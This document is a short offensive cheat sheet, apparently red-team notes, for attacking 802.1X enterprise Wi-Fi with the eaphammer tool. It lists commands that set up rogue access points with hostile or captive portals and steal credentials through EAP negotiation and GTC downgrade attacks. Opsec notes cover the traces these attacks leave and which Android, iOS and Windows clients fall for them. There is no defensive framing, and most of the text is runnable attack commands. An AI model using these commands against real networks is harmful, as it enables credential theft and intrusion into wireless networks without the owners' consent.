802.1x

MiTM

./ehdb --add --identity <user> [--password <password> | --nt-hash <NT>]
./eaphammer -i wlan0 -b <BSSID> -e <ESSID> -c <channel> --auth wpa-eap --hostile-portal
./ehdb --add --identity <user> [--password <password> | --nt-hash <NT>]
./eaphammer -i wlan0 -b <BSSID> -e <ESSID> -c <channel> --auth wpa-eap --captive-portal

Stealing credentials - GTC downgrade

Opsec Considerations:

During the negotiation there are two indicators on the wireless endpoint : EAP method not supported by legitimate AP and EAP methods are suggested in a different order.

Efficient against Android phones.

Efficient against iOS but it prompt for certificate.

Only a challenge-response against Windows can be captured.

Does not work if:
- the supplicant uses a certificate based authentication since there is no inner authentication
- the supplicant validates the server certificate

Balanced Approach (default)

Phase 1 (outer authentication):

PEAP,TTLS,TLS,FAST

Phase 2 (inner authentication):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

./eaphammer -i <wlan0> --auth wpa-eap -e <ESSID> --creds -c <same_channel> -b <similar_BSSID>
Weakest to strongest

Phase 1 (outer authentication)

PEAP,TTLS,TLS,FAST

Phase 2 (inner authentication)

GTC,TTLS-PAP,MD5,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,TTLS-MSCHAPV2,TTLS

./eaphammer -i <wlan0> --negotiate weakest --auth wpa-eap -e <ESSID> --creds -c <channel> -b <BSSID>
Explicite GTC downgrade
./eaphammer -i <wlan0> --negotiate gtc-downgrade --auth wpa-eap -e <ESSID> --creds -c <channel> -b <BSSID>